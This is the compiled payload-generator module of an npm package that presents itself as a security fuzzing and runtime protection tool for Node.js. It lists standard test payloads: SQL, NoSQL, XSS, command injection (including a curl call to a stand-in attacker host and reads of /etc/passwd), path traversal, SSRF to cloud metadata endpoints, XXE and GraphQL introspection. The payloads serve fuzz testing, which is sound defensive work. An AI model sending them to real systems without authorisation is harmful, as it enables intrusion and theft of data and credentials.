UNPKG

aimless-security

Version:

Enhanced Runtime Application Self-Protection (RASP) and API Fuzzing Engine with advanced threat detection, behavioral analysis, and intelligent response scoring for Node.js applications

github.com/CamozDevelopment/Aimless-Security

CamozDevelopment/Aimless-Security

159 lines 5.99 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.PayloadGenerator = void 0; class PayloadGenerator { constructor() { // SQL Injection payloads this.sqlPayloads = [ "' OR '1'='1", "' OR 1=1--", "admin'--", "' UNION SELECT NULL--", "1' AND '1'='1", "'; DROP TABLE users--", "' OR 'x'='x", "1 AND 1=1", "1' ORDER BY 1--", "' UNION ALL SELECT NULL,NULL--" ]; // NoSQL Injection payloads this.nosqlPayloads = [ '{"$gt": ""}', '{"$ne": null}', '{"$where": "1==1"}', '{"$regex": ".*"}', '{"$exists": true}', '{"username": {"$ne": null}, "password": {"$ne": null}}' ]; // XSS payloads this.xssPayloads = [ '<script>alert(1)</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(1)>', 'javascript:alert(1)', '<iframe src="javascript:alert(1)">', '<body onload=alert(1)>', '<input onfocus=alert(1) autofocus>', '"><script>alert(1)</script>', "'><script>alert(1)</script>", '<scr<script>ipt>alert(1)</scr</script>ipt>' ]; // Command Injection payloads this.commandPayloads = [ '; ls -la', '| whoami', '`id`', '$(id)', '; cat /etc/passwd', '& dir', '| type C:\\Windows\\System32\\drivers\\etc\\hosts', '; ping -c 4 127.0.0.1', '`curl http://attacker.com`' ]; // Path Traversal payloads this.pathTraversalPayloads = [ '../../../etc/passwd', '..\\..\\..\\windows\\system32\\config\\sam', '....//....//....//etc/passwd', '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd', '..%252f..%252f..%252fetc%252fpasswd', '/etc/passwd%00.jpg' ]; // Auth Bypass payloads this.authBypassPayloads = [ '', ' ', 'null', 'undefined', '{}', '[]', '{"admin": true}', '{"role": "admin"}', 'Bearer null', 'Bearer undefined', 'Basic YWRtaW46YWRtaW4=', // admin:admin '../admin', '/admin' ]; // SSRF payloads this.ssrfPayloads = [ 'http://localhost', 'http://127.0.0.1', 'http://0.0.0.0', 'http://169.254.169.254/latest/meta-data/', 'http://metadata.google.internal/computeMetadata/v1/', 'http://[::1]', 'http://localhost:22', 'file:///etc/passwd' ]; // XXE payloads this.xxePayloads = [ '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><root>&test;</root>' ]; // Integer overflow payloads this.integerPayloads = [ -1, 0, 2147483647, -2147483648, 9999999999, -9999999999 ]; // Buffer overflow payloads this.bufferPayloads = [ 'A'.repeat(1000), 'A'.repeat(10000), 'A'.repeat(100000) ]; } getAll() { return { sql: this.sqlPayloads, nosql: this.nosqlPayloads, xss: this.xssPayloads, command: this.commandPayloads, pathTraversal: this.pathTraversalPayloads, authBypass: this.authBypassPayloads, ssrf: this.ssrfPayloads, xxe: this.xxePayloads, integer: this.integerPayloads, buffer: this.bufferPayloads }; } getByType(type) { const payloads = this.getAll(); return payloads[type] || []; } mutateValue(value) { const mutations = []; if (typeof value === 'string') { mutations.push(...this.sqlPayloads, ...this.xssPayloads, ...this.commandPayloads, ...this.pathTraversalPayloads, ...this.bufferPayloads); } else if (typeof value === 'number') { mutations.push(...this.integerPayloads); } else if (typeof value === 'object') { mutations.push(...this.nosqlPayloads.map(p => { try { return JSON.parse(p); } catch { return p; } })); } return mutations; } generateGraphQLPayloads() { return [ '{ __schema { types { name } } }', '{ __type(name: "Query") { fields { name } } }', 'query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }', '{ __typename }', 'query { __schema { mutationType { fields { name } } } }' ]; } } exports.PayloadGenerator = PayloadGenerator; //# sourceMappingURL=payload-generator.js.map